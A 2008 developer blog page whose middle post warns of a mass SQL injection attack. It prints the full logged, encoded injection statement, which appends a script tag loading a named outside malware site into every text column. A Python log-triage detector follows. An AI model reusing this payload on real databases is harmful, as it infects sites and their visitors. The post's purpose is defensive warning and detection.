Saturday, May 31, 2008

ASP.NET HttpModule and Session Variables

If you want to use session variables in an HttpModule, you have to write your code in the PreRequestHandlerExecute event. Your class should also implement the IRequiresSessionState interface. If you write your code in the BeginRequest event and try to get or set a session variable, you will get a System.NullReferenceException. More information can be found at http://forums.asp.net/p/1098574/1665773.aspx.

Latest from Mass SQL Injection Attack - Text and VarChar fields got appended with http://www.xiaobaishan.net/dt/Help.asp

***DO NOT GO TO THE ABOVE URL***
This is the latest from the SQL injection attack of the past few months. I didn't find out details about this web site, but the database is infected. The web site apparently tries to exploit a vulnerability in Real Player and Media Player. Please scan your databases.

The web site log shows the following SQL statement. I will post a script to reverse the attack as soon as possible:

dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20cUrSoR%20FoR%20sElEcT%20a.Name,b.Name%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20(b.xType=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0)%20bEgIn%20exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=rtrim(convert(varchar,['%2b@c%2b']))%2bcAsT(0x3C736372697074207372633D687474703A2F2F7777772E7869616F6261697368616E2E6E65742F64742F75732F48656C702E6173703E3C2F7363726970743E%20aS%20vArChAr(67))')%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20tAbLe_cursoR;
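
For triaging web logs for this statement, here is an added example (not part of the original post): it URL-decodes a logged query string, folds the mixed case, and reports which column types the cursor targets and what markup the hex `CAST` appends, with URLs defanged. The function names and the sample lines are assumptions constructed for illustration; the sample uses a harmless `example.invalid` marker.

```python
import re
from urllib.parse import unquote

# Tokens that together mark the cursor-driven mass UPDATE seen in the log.
SIGNATURE = ("declare", "cursor", "sysobjects", "syscolumns", "exec(")
HEX_CAST = re.compile(r"cast\(\s*0x([0-9a-f]+)\s+as\s+n?varchar", re.I)
XTYPE = re.compile(r"xtype\s*=\s*(\d+)", re.I)
# syscolumns.xtype codes for the string column types the statement targets.
XTYPE_NAMES = {35: "text", 99: "ntext", 167: "varchar", 231: "nvarchar"}


def defang(text):
    """Make decoded URLs non-clickable before they reach a report or ticket."""
    return text.replace("http", "hxxp")


def analyze(query_string):
    """Return None for a benign query string, else what is appended and where."""
    decoded = unquote(query_string)          # %20 -> space, %2b -> +
    folded = decoded.lower()                 # defeats the dEcLaRe-style case mixing
    if not all(token in folded for token in SIGNATURE):
        return None
    payloads = []
    for match in HEX_CAST.finditer(decoded):
        digits = match.group(1)
        if len(digits) % 2 == 0:             # skip truncated log entries
            payloads.append(defang(bytes.fromhex(digits).decode("latin-1")))
    types = [XTYPE_NAMES.get(int(n), "xtype " + n) for n in XTYPE.findall(folded)]
    return {"appended": payloads, "column_types": types}


# Constructed sample input: same shape as the logged statement, harmless marker.
_MARKER = "<script src=http://example.invalid/x.js></script>"
SAMPLE_HIT = (
    "dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20cUrSoR%20FoR%20"
    "sElEcT%20a.Name,b.Name%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%20b%20wHeRe%20a.iD=b.iD%20AnD%20"
    "(b.xType=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe=231%20oR%20b.xTyPe=167)%20"
    "exec('UpDaTe%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=rtrim(convert(varchar,['%2b@c%2b']))"
    "%2bcAsT(0x" + _MARKER.encode().hex().upper() + "%20aS%20vArChAr(67))')"
)
SAMPLE_BENIGN = "q=declare%20variables%20in%20sql&page=2"

if __name__ == "__main__":
    for line in (SAMPLE_BENIGN, SAMPLE_HIT):
        print(analyze(line))
```

The decoded markup is the string to search for in text and varchar columns when scanning an affected database.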

Thursday, May 29, 2008

Google Search Appliances - Referencing External JavaScript

Integrating an external JavaScript file, e.g. Search Highlighter (http://code.google.com/p/javascript-search-term-highlighter/), into the Google Search Appliance front-end XSLT can be a little painful. The XSLT will deliver the external JavaScript declaration as XHTML-compliant output, <script type="text/javascript" src="http://www.website.com/external.js" />, and the resulting search page will be blank. To resolve this, simply add a comment inside the script declaration:

<script type="text/javascript" src="http://www.website.com/external.js">
//Comment
</script>